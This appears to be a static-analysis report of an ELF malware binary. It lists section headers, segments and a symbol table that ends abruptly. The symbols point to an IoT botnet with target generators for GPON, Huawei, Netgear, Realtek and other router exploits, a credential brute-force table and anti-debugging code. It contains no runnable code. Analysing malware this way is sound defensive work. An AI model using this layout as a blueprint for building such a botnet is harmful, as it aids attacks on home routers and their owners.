                            .textPROGBITS0x4001000x1000x116780x00x6AX0016
                            .finiPROGBITS0x4117780x117780xe0x00x6AX001
                            .rodataPROGBITS0x4117a00x117a00x65f10x00x2A0032
                            .eh_framePROGBITS0x417d940x17d940x40x00x2A004
                            .ctorsPROGBITS0x5180000x180000x100x00x3WA008
                            .dtorsPROGBITS0x5180100x180100x100x00x3WA008
                            .jcrPROGBITS0x5180200x180200x80x00x3WA008
                            .dataPROGBITS0x5180400x180400x5280x00x3WA0032
                            .bssNOBITS0x5185800x185680x2f900x00x3WA0032
                            .commentPROGBITS0x00x185680xc180x00x0001
                            .shstrtabSTRTAB0x00x191800x660x00x0001
                            .symtabSYMTAB0x00x195a80x4bd80x180x0142728
                            .strtabSTRTAB0x00x1e1800x27320x00x0001

                            Program Segments

                            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                            LOAD0x00x4000000x4000000x17d980x17d986.66800x5R E0x100000.init .text .fini .rodata .eh_frame
                            LOAD0x180000x5180000x5180000x5680x35102.15320x6RW 0x100000.ctors .dtors .jcr .data .bss
                            GNU_STACK0x00x00x00x00x00.00000x6RW 0x8

                            Symbols

                            NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                            .symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                            .symtab0x4000e80SECTION<unknown>DEFAULT1
                            .symtab0x4001000SECTION<unknown>DEFAULT2
                            .symtab0x4117780SECTION<unknown>DEFAULT3
                            .symtab0x4117a00SECTION<unknown>DEFAULT4
                            .symtab0x417d940SECTION<unknown>DEFAULT5
                            .symtab0x5180000SECTION<unknown>DEFAULT6
                            .symtab0x5180100SECTION<unknown>DEFAULT7
                            .symtab0x5180200SECTION<unknown>DEFAULT8
                            .symtab0x5180400SECTION<unknown>DEFAULT9
                            .symtab0x5185800SECTION<unknown>DEFAULT10
                            .symtab0x00SECTION<unknown>DEFAULT11
                            .symtab0x00SECTION<unknown>DEFAULT12
                            .symtab0x00SECTION<unknown>DEFAULT13
                            .symtab0x00SECTION<unknown>DEFAULT14
                            CROSSWEB_IPGen.symtab0x4031f0246FUNC<unknown>DEFAULT2
                            DLINK_IPGen.symtab0x402e90246FUNC<unknown>DEFAULT2
                            GPON1_Range.symtab0x51808020OBJECT<unknown>DEFAULT9
                            GPON2_Range.symtab0x5180a0112OBJECT<unknown>DEFAULT9
                            GPON8080_IPGen.symtab0x4058001311FUNC<unknown>DEFAULT2
                            GPON80_IPGen.symtab0x4051701508FUNC<unknown>DEFAULT2
                            HNAP_IPGen.symtab0x4033b0246FUNC<unknown>DEFAULT2
                            HUAWEI_IPGen.symtab0x4037d01164FUNC<unknown>DEFAULT2
                            JAWS_IPGen.symtab0x403050246FUNC<unknown>DEFAULT2
                            LOCAL_ADDR.symtab0x51aa044OBJECT<unknown>DEFAULT10
                            NETGEAR_IPGen.symtab0x403d802312FUNC<unknown>DEFAULT2
                            R7000_IPGen.symtab0x402cd0246FUNC<unknown>DEFAULT2
                            REALTEK_IPGen.symtab0x4047c02312FUNC<unknown>DEFAULT2
                            TR064_IPGen.symtab0x403610246FUNC<unknown>DEFAULT2
                            VARCON_IPGen.symtab0x402b30246FUNC<unknown>DEFAULT2
                            _Jv_RegisterClasses.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                            _READ.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            _WRITE.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            __CTOR_END__.symtab0x5180080OBJECT<unknown>DEFAULT6
                            __CTOR_LIST__.symtab0x5180000OBJECT<unknown>DEFAULT6
                            __C_ctype_b.symtab0x5185108OBJECT<unknown>DEFAULT9
                            __C_ctype_b.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            __C_ctype_b_data.symtab0x417620768OBJECT<unknown>DEFAULT4
                            __C_ctype_tolower.symtab0x5185208OBJECT<unknown>DEFAULT9
                            __C_ctype_tolower.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            __C_ctype_tolower_data.symtab0x417920768OBJECT<unknown>DEFAULT4
                            __DTOR_END__.symtab0x5180180OBJECT<unknown>DEFAULT7
                            __DTOR_LIST__.symtab0x5180100OBJECT<unknown>DEFAULT7
                            __EH_FRAME_BEGIN__.symtab0x417d940OBJECT<unknown>DEFAULT5
                            __FRAME_END__.symtab0x417d940OBJECT<unknown>DEFAULT5
                            __GI___C_ctype_b.symtab0x5185108OBJECT<unknown>HIDDEN9
                            __GI___C_ctype_b_data.symtab0x417620768OBJECT<unknown>HIDDEN4
                            __GI___C_ctype_tolower.symtab0x5185208OBJECT<unknown>HIDDEN9
                            __GI___C_ctype_tolower_data.symtab0x417920768OBJECT<unknown>HIDDEN4
                            __GI___ctype_b.symtab0x5185188OBJECT<unknown>HIDDEN9
                            __GI___ctype_tolower.symtab0x5185288OBJECT<unknown>HIDDEN9
                            __GI___errno_location.symtab0x4099286FUNC<unknown>HIDDEN2
                            __GI___fgetc_unlocked.symtab0x411394222FUNC<unknown>HIDDEN2
                            __GI___glibc_strerror_r.symtab0x40b27414FUNC<unknown>HIDDEN2
                            __GI___h_errno_location.symtab0x40e7ac6FUNC<unknown>HIDDEN2
                            __GI___libc_fcntl.symtab0x40934c100FUNC<unknown>HIDDEN2
                            __GI___libc_lseek.symtab0x40e4e445FUNC<unknown>HIDDEN2
                            __GI___libc_open.symtab0x409514106FUNC<unknown>HIDDEN2
                            __GI___uClibc_fini.symtab0x40dde870FUNC<unknown>HIDDEN2
                            __GI___uClibc_init.symtab0x40de6767FUNC<unknown>HIDDEN2
                            __GI___xpg_strerror_r.symtab0x40b284194FUNC<unknown>HIDDEN2
                            __GI__exit.symtab0x40e1dc42FUNC<unknown>HIDDEN2
                            __GI_abort.symtab0x40d178276FUNC<unknown>HIDDEN2
                            __GI_atoi.symtab0x40d7ac18FUNC<unknown>HIDDEN2
                            __GI_bind.symtab0x40bd4843FUNC<unknown>HIDDEN2
                            __GI_brk.symtab0x41028443FUNC<unknown>HIDDEN2
                            __GI_clock_getres.symtab0x40e20841FUNC<unknown>HIDDEN2
                            __GI_close.symtab0x4093b041FUNC<unknown>HIDDEN2
                            __GI_closedir.symtab0x409730116FUNC<unknown>HIDDEN2
                            __GI_connect.symtab0x40bd7443FUNC<unknown>HIDDEN2
                            __GI_dup2.symtab0x4093dc44FUNC<unknown>HIDDEN2
                            __GI_errno.symtab0x51a93c4OBJECT<unknown>HIDDEN10
                            __GI_execl.symtab0x40d994287FUNC<unknown>HIDDEN2
                            __GI_execve.symtab0x40e23438FUNC<unknown>HIDDEN2
                            __GI_exit.symtab0x40d93892FUNC<unknown>HIDDEN2
                            __GI_fclose.symtab0x4102f4259FUNC<unknown>HIDDEN2
                            __GI_fcntl.symtab0x40934c100FUNC<unknown>HIDDEN2
                            __GI_fcntl64.symtab0x40934c100FUNC<unknown>HIDDEN2
                            __GI_fflush_unlocked.symtab0x410900329FUNC<unknown>HIDDEN2
                            __GI_fgetc_unlocked.symtab0x411394222FUNC<unknown>HIDDEN2
                            __GI_fgets.symtab0x4107b8109FUNC<unknown>HIDDEN2
                            __GI_fgets_unlocked.symtab0x410a4c116FUNC<unknown>HIDDEN2
                            __GI_fopen.symtab0x4103f810FUNC<unknown>HIDDEN2
                            __GI_fork.symtab0x40940838FUNC<unknown>HIDDEN2
                            __GI_fputs_unlocked.symtab0x40ab5056FUNC<unknown>HIDDEN2
                            __GI_fseek.symtab0x4104045FUNC<unknown>HIDDEN2
                            __GI_fseeko64.symtab0x41040c218FUNC<unknown>HIDDEN2
                            __GI_fstat.symtab0x40e25c82FUNC<unknown>HIDDEN2
                            __GI_fstat64.symtab0x40e25c82FUNC<unknown>HIDDEN2
                            __GI_fwrite_unlocked.symtab0x40ab88134FUNC<unknown>HIDDEN2
                            __GI_getc_unlocked.symtab0x411394222FUNC<unknown>HIDDEN2
                            __GI_getdtablesize.symtab0x40e3dc35FUNC<unknown>HIDDEN2
                            __GI_getegid.symtab0x40e40038FUNC<unknown>HIDDEN2
                            __GI_geteuid.symtab0x40e42838FUNC<unknown>HIDDEN2
                            __GI_getgid.symtab0x40e45038FUNC<unknown>HIDDEN2
                            __GI_gethostbyname.symtab0x40b98c53FUNC<unknown>HIDDEN2
                            __GI_gethostbyname_r.symtab0x40b9c4897FUNC<unknown>HIDDEN2
                            __GI_getpagesize.symtab0x40e47819FUNC<unknown>HIDDEN2
                            __GI_getpid.symtab0x40943038FUNC<unknown>HIDDEN2
                            __GI_getrlimit.symtab0x40e48c40FUNC<unknown>HIDDEN2
                            __GI_getsockname.symtab0x40bda041FUNC<unknown>HIDDEN2
                            __GI_getuid.symtab0x40e4b438FUNC<unknown>HIDDEN2
                            __GI_h_errno.symtab0x51a9404OBJECT<unknown>HIDDEN10
                            __GI_inet_addr.symtab0x410d7028FUNC<unknown>HIDDEN2
                            __GI_inet_aton.symtab0x40f7fc137FUNC<unknown>HIDDEN2
                            __GI_inet_ntop.symtab0x40b77c527FUNC<unknown>HIDDEN2
                            __GI_inet_pton.symtab0x40b477493FUNC<unknown>HIDDEN2
                            __GI_initstate_r.symtab0x40d5a3185FUNC<unknown>HIDDEN2
                            __GI_ioctl.symtab0x409480104FUNC<unknown>HIDDEN2
                            __GI_isatty.symtab0x40b36425FUNC<unknown>HIDDEN2
                            __GI_kill.symtab0x4094e844FUNC<unknown>HIDDEN2
                            __GI_listen.symtab0x40be0044FUNC<unknown>HIDDEN2
                            __GI_lseek.symtab0x40e4e445FUNC<unknown>HIDDEN2
                            __GI_lseek64.symtab0x40e4dc5FUNC<unknown>HIDDEN2
                            __GI_memchr.symtab0x40f538240FUNC<unknown>HIDDEN2
                            __GI_memcpy.symtab0x40ac10102FUNC<unknown>HIDDEN2
                            __GI_memmove.symtab0x40aec4734FUNC<unknown>HIDDEN2
                            __GI_mempcpy.symtab0x40f25090FUNC<unknown>HIDDEN2
                            __GI_memrchr.symtab0x40f628237FUNC<unknown>HIDDEN2
                            __GI_memset.symtab0x40ac80210FUNC<unknown>HIDDEN2
                            __GI_mmap.symtab0x40e19448FUNC<unknown>HIDDEN2
                            __GI_mremap.symtab0x40e51442FUNC<unknown>HIDDEN2
                            __GI_munmap.symtab0x40e54038FUNC<unknown>HIDDEN2
                            __GI_nanosleep.symtab0x40e56838FUNC<unknown>HIDDEN2
                            __GI_open.symtab0x409514106FUNC<unknown>HIDDEN2
                            __GI_opendir.symtab0x4097a4243FUNC<unknown>HIDDEN2
                            __GI_poll.symtab0x4102c841FUNC<unknown>HIDDEN2
                            __GI_printf.symtab0x409960157FUNC<unknown>HIDDEN2
                            __GI_raise.symtab0x41025818FUNC<unknown>HIDDEN2
                            __GI_random.symtab0x40d29872FUNC<unknown>HIDDEN2
                            __GI_random_r.symtab0x40d4a090FUNC<unknown>HIDDEN2
                            __GI_rawmemchr.symtab0x410c00190FUNC<unknown>HIDDEN2
                            __GI_read.symtab0x4095b839FUNC<unknown>HIDDEN2
                            __GI_readdir.symtab0x409898143FUNC<unknown>HIDDEN2
                            __GI_readlink.symtab0x4095e039FUNC<unknown>HIDDEN2
                            __GI_recv.symtab0x40be2c11FUNC<unknown>HIDDEN2
                            __GI_recvfrom.symtab0x40be3845FUNC<unknown>HIDDEN2
                            __GI_sbrk.symtab0x40e59074FUNC<unknown>HIDDEN2
                            __GI_select.symtab0x40960844FUNC<unknown>HIDDEN2
                            __GI_send.symtab0x40be6811FUNC<unknown>HIDDEN2
                            __GI_sendto.symtab0x40be7448FUNC<unknown>HIDDEN2
                            __GI_setsid.symtab0x40963438FUNC<unknown>HIDDEN2
                            __GI_setsockopt.symtab0x40bea453FUNC<unknown>HIDDEN2
                            __GI_setstate_r.symtab0x40d3f8168FUNC<unknown>HIDDEN2
                            __GI_sigaction.symtab0x40e09d247FUNC<unknown>HIDDEN2
                            __GI_sigaddset.symtab0x40bf0c35FUNC<unknown>HIDDEN2
                            __GI_sigemptyset.symtab0x40bf3020FUNC<unknown>HIDDEN2
                            __GI_signal.symtab0x40bf44168FUNC<unknown>HIDDEN2
                            __GI_sigprocmask.symtab0x40965c85FUNC<unknown>HIDDEN2
                            __GI_sleep.symtab0x40dab4415FUNC<unknown>HIDDEN2
                            __GI_snprintf.symtab0x409a00137FUNC<unknown>HIDDEN2
                            __GI_socket.symtab0x40bedc47FUNC<unknown>HIDDEN2
                            __GI_sprintf.symtab0x409a8c149FUNC<unknown>HIDDEN2
                            __GI_srandom_r.symtab0x40d4fa169FUNC<unknown>HIDDEN2
                            __GI_strcasecmp.symtab0x41147448FUNC<unknown>HIDDEN2
                            __GI_strchr.symtab0x40f2b0417FUNC<unknown>HIDDEN2
                            __GI_strcmp.symtab0x410ac033FUNC<unknown>HIDDEN2
                            __GI_strcoll.symtab0x410ac033FUNC<unknown>HIDDEN2
                            __GI_strcpy.symtab0x40f460213FUNC<unknown>HIDDEN2
                            __GI_strcspn.symtab0x40ad58135FUNC<unknown>HIDDEN2
                            __GI_strdup.symtab0x410d3854FUNC<unknown>HIDDEN2
                            __GI_strlen.symtab0x40ade0225FUNC<unknown>HIDDEN2
                            __GI_strncat.symtab0x410cc0119FUNC<unknown>HIDDEN2
                            __GI_strncpy.symtab0x40f718131FUNC<unknown>HIDDEN2
                            __GI_strnlen.symtab0x40b1a4206FUNC<unknown>HIDDEN2
                            __GI_strpbrk.symtab0x410ae8140FUNC<unknown>HIDDEN2
                            __GI_strspn.symtab0x410b78135FUNC<unknown>HIDDEN2
                            __GI_strtok.symtab0x40b35810FUNC<unknown>HIDDEN2
                            __GI_strtok_r.symtab0x40f79c94FUNC<unknown>HIDDEN2
                            __GI_strtol.symtab0x40d7c010FUNC<unknown>HIDDEN2
                            __GI_strtoll.symtab0x40d7c010FUNC<unknown>HIDDEN2
                            __GI_sysconf.symtab0x40dc54351FUNC<unknown>HIDDEN2
                            __GI_tcgetattr.symtab0x40b380110FUNC<unknown>HIDDEN2
                            __GI_time.symtab0x4096b439FUNC<unknown>HIDDEN2
                            __GI_times.symtab0x40e5dc39FUNC<unknown>HIDDEN2
                            __GI_tolower.symtab0x40e78c30FUNC<unknown>HIDDEN2
                            __GI_unlink.symtab0x4096dc38FUNC<unknown>HIDDEN2
                            __GI_vfork.symtab0x40e1c421FUNC<unknown>HIDDEN2
                            __GI_vfprintf.symtab0x409d18143FUNC<unknown>HIDDEN2
                            __GI_vsnprintf.symtab0x409b24199FUNC<unknown>HIDDEN2
                            __GI_wait4.symtab0x40e60447FUNC<unknown>HIDDEN2
                            __GI_wcrtomb.symtab0x40e7b468FUNC<unknown>HIDDEN2
                            __GI_wcsnrtombs.symtab0x40e808140FUNC<unknown>HIDDEN2
                            __GI_wcsrtombs.symtab0x40e7f815FUNC<unknown>HIDDEN2
                            __GI_write.symtab0x40970442FUNC<unknown>HIDDEN2
                            __JCR_END__.symtab0x5180200OBJECT<unknown>DEFAULT8
                            __JCR_LIST__.symtab0x5180200OBJECT<unknown>DEFAULT8
                            __app_fini.symtab0x51a9288OBJECT<unknown>HIDDEN10
                            __atexit_lock.symtab0x5184e040OBJECT<unknown>DEFAULT9
                            __bsd_signal.symtab0x40bf44168FUNC<unknown>HIDDEN2
                            __bss_start.symtab0x5185680NOTYPE<unknown>DEFAULTSHN_ABS
                            __check_one_fd.symtab0x40de3253FUNC<unknown>DEFAULT2
                            __ctype_b.symtab0x5185188OBJECT<unknown>DEFAULT9
                            __ctype_tolower.symtab0x5185288OBJECT<unknown>DEFAULT9
                            __curbrk.symtab0x51a9908OBJECT<unknown>HIDDEN10
                            __data_start.symtab0x5180500NOTYPE<unknown>DEFAULT9
                            __decode_answer.symtab0x410f38242FUNC<unknown>HIDDEN2
                            __decode_dotted.symtab0x411544246FUNC<unknown>HIDDEN2
                            __decode_header.symtab0x410e30161FUNC<unknown>HIDDEN2
                            __deregister_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                            __dns_lookup.symtab0x40f8881862FUNC<unknown>HIDDEN2
                            __do_global_ctors_aux.symtab0x4117400FUNC<unknown>DEFAULT2
                            __do_global_dtors_aux.symtab0x4001000FUNC<unknown>DEFAULT2
                            __dso_handle.symtab0x5180400OBJECT<unknown>HIDDEN9
                            __encode_dotted.symtab0x4114a4160FUNC<unknown>HIDDEN2
                            __encode_header.symtab0x410d8c163FUNC<unknown>HIDDEN2
                            __encode_question.symtab0x410ed480FUNC<unknown>HIDDEN2
                            __environ.symtab0x51a9188OBJECT<unknown>DEFAULT10
                            __errno_location.symtab0x4099286FUNC<unknown>DEFAULT2
                            __errno_location.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            __exit_cleanup.symtab0x51a9088OBJECT<unknown>HIDDEN10
                            __fgetc_unlocked.symtab0x411394222FUNC<unknown>DEFAULT2
                            __fini_array_end.symtab0x5180000NOTYPE<unknown>HIDDENSHN_ABS
                            __fini_array_start.symtab0x5180000NOTYPE<unknown>HIDDENSHN_ABS
                            __get_hosts_byname_r.symtab0x41022848FUNC<unknown>HIDDEN2
                            __getdents.symtab0x40e2b0300FUNC<unknown>HIDDEN2
                            __getdents64.symtab0x40e2b0300FUNC<unknown>HIDDEN2
                            __getpagesize.symtab0x40e47819FUNC<unknown>DEFAULT2
                            __glibc_strerror_r.symtab0x40b27414FUNC<unknown>DEFAULT2
                            __glibc_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            __h_errno_location.symtab0x40e7ac6FUNC<unknown>DEFAULT2
                            __h_errno_location.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            __init_array_end.symtab0x5180000NOTYPE<unknown>HIDDENSHN_ABS
                            __init_array_start.symtab0x5180000NOTYPE<unknown>HIDDENSHN_ABS
                            __length_dotted.symtab0x41163c59FUNC<unknown>HIDDEN2
                            __length_question.symtab0x410f2419FUNC<unknown>HIDDEN2
                            __libc_close.symtab0x4093b041FUNC<unknown>DEFAULT2
                            __libc_connect.symtab0x40bd7443FUNC<unknown>DEFAULT2
                            __libc_creat.symtab0x40957e14FUNC<unknown>DEFAULT2
                            __libc_fcntl.symtab0x40934c100FUNC<unknown>DEFAULT2
                            __libc_fcntl64.symtab0x40934c100FUNC<unknown>DEFAULT2
                            __libc_fork.symtab0x40940838FUNC<unknown>DEFAULT2
                            __libc_getpid.symtab0x40943038FUNC<unknown>DEFAULT2
                            __libc_lseek.symtab0x40e4e445FUNC<unknown>DEFAULT2
                            __libc_lseek64.symtab0x40e4dc5FUNC<unknown>DEFAULT2
                            __libc_nanosleep.symtab0x40e56838FUNC<unknown>DEFAULT2
                            __libc_open.symtab0x409514106FUNC<unknown>DEFAULT2
                            __libc_poll.symtab0x4102c841FUNC<unknown>DEFAULT2
                            __libc_read.symtab0x4095b839FUNC<unknown>DEFAULT2
                            __libc_recv.symtab0x40be2c11FUNC<unknown>DEFAULT2
                            __libc_recvfrom.symtab0x40be3845FUNC<unknown>DEFAULT2
                            __libc_select.symtab0x40960844FUNC<unknown>DEFAULT2
                            __libc_send.symtab0x40be6811FUNC<unknown>DEFAULT2
                            __libc_sendto.symtab0x40be7448FUNC<unknown>DEFAULT2
                            __libc_sigaction.symtab0x40e09d247FUNC<unknown>DEFAULT2
                            __libc_stack_end.symtab0x51a9108OBJECT<unknown>DEFAULT10
                            __libc_system.symtab0x40d65c335FUNC<unknown>DEFAULT2
                            __libc_write.symtab0x40970442FUNC<unknown>DEFAULT2
                            __malloc_consolidate.symtab0x40cdfd410FUNC<unknown>HIDDEN2
                            __malloc_largebin_index.symtab0x40c04896FUNC<unknown>DEFAULT2
                            __malloc_lock.symtab0x51836040OBJECT<unknown>DEFAULT9
                            __malloc_state.symtab0x51ade01752OBJECT<unknown>DEFAULT10
                            __malloc_trim.symtab0x40cd64153FUNC<unknown>DEFAULT2
                            __nameserver.symtab0x51b4e024OBJECT<unknown>HIDDEN10
                            __nameservers.symtab0x51b4f84OBJECT<unknown>HIDDEN10
                            __open_etc_hosts.symtab0x41102c42FUNC<unknown>HIDDEN2
                            __open_nameservers.symtab0x40ffd0597FUNC<unknown>HIDDEN2
                            __pagesize.symtab0x51a9208OBJECT<unknown>DEFAULT10
                            __preinit_array_end.symtab0x5180000NOTYPE<unknown>HIDDENSHN_ABS
                            __preinit_array_start.symtab0x5180000NOTYPE<unknown>HIDDENSHN_ABS
                            __pthread_initialize_minimal.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                            __pthread_mutex_init.symtab0x40de2e3FUNC<unknown>DEFAULT2
                            __pthread_mutex_lock.symtab0x40de2e3FUNC<unknown>DEFAULT2
                            __pthread_mutex_trylock.symtab0x40de2e3FUNC<unknown>DEFAULT2
                            __pthread_mutex_unlock.symtab0x40de2e3FUNC<unknown>DEFAULT2
                            __pthread_return_0.symtab0x40de2e3FUNC<unknown>DEFAULT2
                            __pthread_return_void.symtab0x40de311FUNC<unknown>DEFAULT2
                            __raise.symtab0x41025818FUNC<unknown>HIDDEN2
                            __read_etc_hosts_r.symtab0x411056830FUNC<unknown>HIDDEN2
                            __register_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                            __resolv_lock.symtab0x51854040OBJECT<unknown>DEFAULT9
                            __restore_rt.symtab0x40e0940NOTYPE<unknown>DEFAULT2
                            __rtld_fini.symtab0x51a9308OBJECT<unknown>HIDDEN10
                            __searchdomain.symtab0x51b4c032OBJECT<unknown>HIDDEN10
                            __searchdomains.symtab0x51b4fc4OBJECT<unknown>HIDDEN10
                            __sigaddset.symtab0x40c00c28FUNC<unknown>DEFAULT2
                            __sigdelset.symtab0x40c02830FUNC<unknown>DEFAULT2
                            __sigismember.symtab0x40bfec32FUNC<unknown>DEFAULT2
                            __stdin.symtab0x5181388OBJECT<unknown>DEFAULT9
                            __stdio_READ.symtab0x41167858FUNC<unknown>HIDDEN2
                            __stdio_WRITE.symtab0x40e894147FUNC<unknown>HIDDEN2
                            __stdio_adjust_position.symtab0x4104e8133FUNC<unknown>HIDDEN2
                            __stdio_fwrite.symtab0x40e928259FUNC<unknown>HIDDEN2
                            __stdio_init_mutex.symtab0x409c5715FUNC<unknown>HIDDEN2
                            __stdio_mutex_initializer.4280.symtab0x41644040OBJECT<unknown>DEFAULT4
                            __stdio_rfill.symtab0x4116b437FUNC<unknown>HIDDEN2
                            __stdio_seek.symtab0x41079831FUNC<unknown>HIDDEN2
                            __stdio_trans2r_o.symtab0x4116dc90FUNC<unknown>HIDDEN2
                            __stdio_trans2w_o.symtab0x40ea2c148FUNC<unknown>HIDDEN2
                            __stdio_wcommit.symtab0x409cf039FUNC<unknown>HIDDEN2
                            __stdout.symtab0x5181408OBJECT<unknown>DEFAULT9
                            __syscall_error.symtab0x4102b022FUNC<unknown>HIDDEN2
                            __syscall_error.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            __syscall_fcntl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            __uClibc_fini.symtab0x40dde870FUNC<unknown>DEFAULT2
                            __uClibc_init.symtab0x40de6767FUNC<unknown>DEFAULT2
                            __uClibc_main.symtab0x40deaa489FUNC<unknown>DEFAULT2
                            __uClibc_main.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            __uclibc_progname.symtab0x5185088OBJECT<unknown>HIDDEN9
                            __vfork.symtab0x40e1c421FUNC<unknown>HIDDEN2
                            __xpg_strerror_r.symtab0x40b284194FUNC<unknown>DEFAULT2
                            __xpg_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            __xstat64_conv.symtab0x40e634172FUNC<unknown>HIDDEN2
                            __xstat_conv.symtab0x40e6e0172FUNC<unknown>HIDDEN2
                            _adjust_pos.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            _charpad.symtab0x409da868FUNC<unknown>DEFAULT2
                            _cs_funcs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            _dl_aux_init.symtab0x41026c23FUNC<unknown>DEFAULT2
                            _dl_phdr.symtab0x51b5008OBJECT<unknown>DEFAULT10
                            _dl_phnum.symtab0x51b5088OBJECT<unknown>DEFAULT10
                            _edata.symtab0x5185680NOTYPE<unknown>DEFAULTSHN_ABS
                            _end.symtab0x51b5100NOTYPE<unknown>DEFAULTSHN_ABS
                            _errno.symtab0x51a93c4OBJECT<unknown>DEFAULT10
                            _exit.symtab0x40e1dc42FUNC<unknown>DEFAULT2
                            _exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            _fini.symtab0x4117785FUNC<unknown>DEFAULT3
                            _fixed_buffers.symtab0x5186c08192OBJECT<unknown>DEFAULT10
                            _fopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            _fp_out_narrow.symtab0x409dec120FUNC<unknown>DEFAULT2
                            _fpmaxtostr.symtab0x40ec041608FUNC<unknown>HIDDEN2
                            _fpmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            _fwrite.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            _h_errno.symtab0x51a9404OBJECT<unknown>DEFAULT10
                            _init.symtab0x4000e85FUNC<unknown>DEFAULT1
                            _load_inttype.symtab0x40eac085FUNC<unknown>HIDDEN2
                            _load_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            _ppfs_init.symtab0x40a4a0114FUNC<unknown>HIDDEN2
                            _ppfs_init.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            _ppfs_parsespec.symtab0x40a7521022FUNC<unknown>HIDDEN2
                            _ppfs_parsespec.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            _ppfs_prepargs.symtab0x40a51467FUNC<unknown>HIDDEN2
                            _ppfs_prepargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            _ppfs_setargs.symtab0x40a558457FUNC<unknown>HIDDEN2
                            _ppfs_setargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            _promoted_size.symtab0x40a72446FUNC<unknown>DEFAULT2
                            _pthread_cleanup_pop_restore.symtab0x40de311FUNC<unknown>DEFAULT2
                            _pthread_cleanup_push_defer.symtab0x40de311FUNC<unknown>DEFAULT2
                            _rfill.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            _sigintr.symtab0x51ad60128OBJECT<unknown>HIDDEN10
                            _start.symtab0x40019442FUNC<unknown>DEFAULT2
                            _stdio.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            _stdio_fopen.symtab0x410570551FUNC<unknown>HIDDEN2
                            _stdio_init.symtab0x409bec107FUNC<unknown>HIDDEN2
                            _stdio_openlist.symtab0x5181488OBJECT<unknown>DEFAULT9
                            _stdio_openlist_add_lock.symtab0x51816040OBJECT<unknown>DEFAULT9
                            _stdio_openlist_dec_use.symtab0x410828216FUNC<unknown>DEFAULT2
                            _stdio_openlist_del_count.symtab0x5186a44OBJECT<unknown>DEFAULT10
                            _stdio_openlist_del_lock.symtab0x5181a040OBJECT<unknown>DEFAULT9
                            _stdio_openlist_use_count.symtab0x5186a04OBJECT<unknown>DEFAULT10
                            _stdio_streams.symtab0x5181e0384OBJECT<unknown>DEFAULT9
                            _stdio_term.symtab0x409c66135FUNC<unknown>HIDDEN2
                            _stdio_user_locking.symtab0x5181c84OBJECT<unknown>DEFAULT9
                            _stdlib_strto_l.symtab0x40d7cc362FUNC<unknown>HIDDEN2
                            _stdlib_strto_l.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            _store_inttype.symtab0x40eb1846FUNC<unknown>HIDDEN2
                            _store_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            _string_syserrmsgs.symtab0x4165802906OBJECT<unknown>HIDDEN4
                            _string_syserrmsgs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            _trans2r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            _trans2w.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            _uintmaxtostr.symtab0x40eb48187FUNC<unknown>HIDDEN2
                            _uintmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            _vfprintf_internal.symtab0x409e641595FUNC<unknown>HIDDEN2
                            _vfprintf_internal.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            _wcommit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            abort.symtab0x40d178276FUNC<unknown>DEFAULT2
                            abort.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            add_auth_entry.symtab0x406850435FUNC<unknown>DEFAULT2
                            anti_gdb_entry.symtab0x40103012FUNC<unknown>DEFAULT2
                            atoi.symtab0x40d7ac18FUNC<unknown>DEFAULT2
                            atoi.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            auth_table.symtab0x5186888OBJECT<unknown>DEFAULT10
                            auth_table_len.symtab0x5186404OBJECT<unknown>DEFAULT10
                            auth_table_max_weight.symtab0x5186902OBJECT<unknown>DEFAULT10
                            bcopy.symtab0x40b34814FUNC<unknown>DEFAULT2
                            bcopy.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            been_there_done_that.symtab0x51a9004OBJECT<unknown>DEFAULT10
                            been_there_done_that.3160.symtab0x51a9384OBJECT<unknown>DEFAULT10
                            bind.symtab0x40bd4843FUNC<unknown>DEFAULT2
                            bind.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            brk.symtab0x41028443FUNC<unknown>DEFAULT2
                            brk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            bsd_signal.symtab0x40bf44168FUNC<unknown>DEFAULT2
                            buf.5285.symtab0x51a6e0500OBJECT<unknown>DEFAULT10
